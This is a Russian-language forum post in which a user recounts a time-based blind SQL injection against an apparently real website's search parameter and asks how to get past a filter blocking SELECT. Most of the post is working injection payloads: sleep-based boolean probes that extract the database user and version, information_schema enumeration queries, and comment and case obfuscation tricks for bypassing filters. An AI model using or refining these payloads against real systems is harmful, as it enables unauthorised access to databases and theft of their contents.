|
Новичок
Регистрация: 06.11.2010
Сообщений: 4
С нами:
8165846
Репутация:
0
|
|
Нормального вывода нет совсем. Это точно.
Остается засыпание.
За наводку на тампер спасибо, если до конца смогу раскрутить скулю, тогда попробую, а пока еще не могу полноценный запрос получить.
Немного доработал скулю и получил следующее:
name=blah&page=/rus/search.php'=(IF(ASCII(SUBSTRING(USER(),4,1))='116' ,1,sleep(0.1)))='
Таким образом узнал пользователя, версию бд, название бд.
Но дальше пойти не могу.....нужно же вместо USER() вставлять полноценный запрос селект:
Вот что пробовал:
Нашел в инете примеры обхода пробелов, типа:
select(null),mid(group_concat(table_name),600,100) ,(null)from(information_schema.tables)
select(null),table_name,(null)from(information_sch ema.tables)limit 28
select(null),group_concat(column_name),(null)from( information_schema.columns)where(table_name)=(0x75 73657273)
(вставленно заранее ложный кондишен и если запрос составлен правильно, то должен засыпать на секунду.)
Не засыпает:
name=blah&page=/rus/search.php'=(IF(ASCII(SELECT SUBSTRING(USER(),4,1))='WTF',1,sleep(0.1)))='
name=blah&page=/rus/search.php'=(IF(ASCII(SELECT(null)SUBSTRING(USER() ,4,1))='WTF',1,sleep(0.1)))='
name=blah&page=/rus/search.php'=(IF(ASCII(SELECT(null),SUBSTRING(USER( ),4,1))='WTF',1,sleep(0.1)))='
name=blah&page=/rus/search.php'=(IF(ASCII(SELECT(0),SUBSTRING(USER(),4 ,1))='WTF',1,sleep(0.1)))='
name=blah&page=/rus/search.php'=(IF(ASCII(SUBSTRING(select(0),group_co ncat(table_name),(0)from(information_schema.tables ),4,1))='WTF',1,sleep(0.1)))='
name=blah&page=/rus/search.php'=(IF(ASCII(SUBSTRING(SeLeCt(0),gRoup_Co nCat(table_name),(0)fRom(information_schema.tables ),4,1))='WTF',1,sleep(0.1)))='
name=blah&page=/rus/search.php'=(IF(ASCII(SUBSTRING(SeLeCT+1,2,concat(/*!table_name*/)+FrOM/*information_schema*/.tables/*!WHERE*/+/*!TaBlE_ScHeMa*/+like+database()),4,1))='WTF',1,sleep(0.1)))='
name=blah&page=/rus/search.php'=(IF(ASCII(SELECT/*foo*/SUBSTRING(USER(),4,1))='WTF',1,sleep(0.1)))='
Вроде как фильруется селект
Засыпает:
name=blah&page=/rus/search.php'=(IF(ASCII(/*Sfoo*/SUBSTRING(USER(),4,1))='WTF',1,sleep(0.1)))='
name=blah&page=/rus/search.php'=(IF(ASCII(SUBS/*Sfoo*/TRING(USER(),4,1))='WTF',1,sleep(0.1)))='
|